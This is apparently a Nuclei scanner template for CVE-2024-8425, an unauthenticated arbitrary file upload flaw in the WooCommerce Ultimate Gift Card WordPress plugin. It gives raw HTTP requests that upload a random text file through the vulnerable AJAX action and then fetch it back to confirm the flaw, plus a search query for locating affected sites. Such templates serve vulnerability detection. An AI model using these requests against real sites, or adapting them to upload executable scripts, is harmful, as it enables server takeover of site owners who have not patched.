id: CVE-2024-8425

info:
  name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
  author: jsnv-dev
  severity: critical
  description: |
    The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  impact: |
    Unauthenticated attackers can upload arbitrary files including PHP scripts to the server through insufficient file type validation, enabling remote code execution and complete server compromise.
  remediation: |
    Update WooCommerce Ultimate Gift Card plugin to a version later than 2.6.0 that addresses the arbitrary file upload vulnerability in the mwb_wgm_preview_mail and mwb_wgm_woocommerce_add_cart_item_data functions.
  reference:
    - https://github.com/KTN1990/CVE-2024-8425
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8425
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8425
    epss-score: 0.41027
    epss-percentile: 0.9746
    cwe-id: CWE-434
    cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpswings
    product: woocommerce_ultimate_gift_card
    fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
  tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln

variables:
  filename: "{{rand_base(7)}}.txt"
  file_content: "{{randstr}}"
  file_message: "{{randstr}}"
  boundary_id: "{{rand_int(100000,999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}

        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="mwb_wgm_preview_email"

        test
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="tempId"

        1
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="message"

        {{file_message}}
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundary{{boundary_id}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{file_message}}&name={{filename}}")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{file_content}}"

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - file_content
# digest: 490a00463044022004c5ee13badb3c43aa9cd59e9fccfd950d193fe6b8079e4e12956bb743b0400a0220531147b2bfd0943526b34a51ccf8e93f9881b4f5d5b5b95aba293051630c0fb5:922c64590222798bb761d5b6d8e72950